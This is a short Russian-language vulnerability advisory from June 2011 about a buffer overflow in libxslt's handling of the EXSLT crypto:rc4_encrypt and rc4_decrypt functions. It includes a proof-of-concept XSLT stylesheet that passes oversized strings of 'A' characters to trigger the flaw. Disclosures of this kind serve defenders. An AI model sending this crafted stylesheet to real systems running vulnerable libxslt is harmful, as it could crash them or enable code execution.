Переполнение буфера в libxslt

23 июня 2011

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в crypto.c при обработке функций XSLT «crypto:rc4_encrypt» и «crypto:rc4_decrypt». Атакующий может передать специально сформированную таблицу стилей, что приведет к выполнению произвольного кода.

&lt;xsl:stylesheet version=&quot;1.0&quot;
xmlns:xsl=&quot;https://www.w3.org/1999/XSL/Transform&quot;
xmlns:str=&quot;https://exslt.org/strings&quot;
xmlns:crypto=&quot;https://exslt.org/crypto&quot;
xmlns:math=&quot;https://exslt.org/math&quot;
extension-element-prefixes=&quot;str crypto math&quot;&gt;
&lt;xsl:template match=&quot;/&quot;&gt;
&lt;xsl:value-of select=&quot;crypto:rc4_encrypt('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')&quot;/&gt;
blah
&lt;/xsl:template&gt;
&lt;/xsl:stylesheet&gt;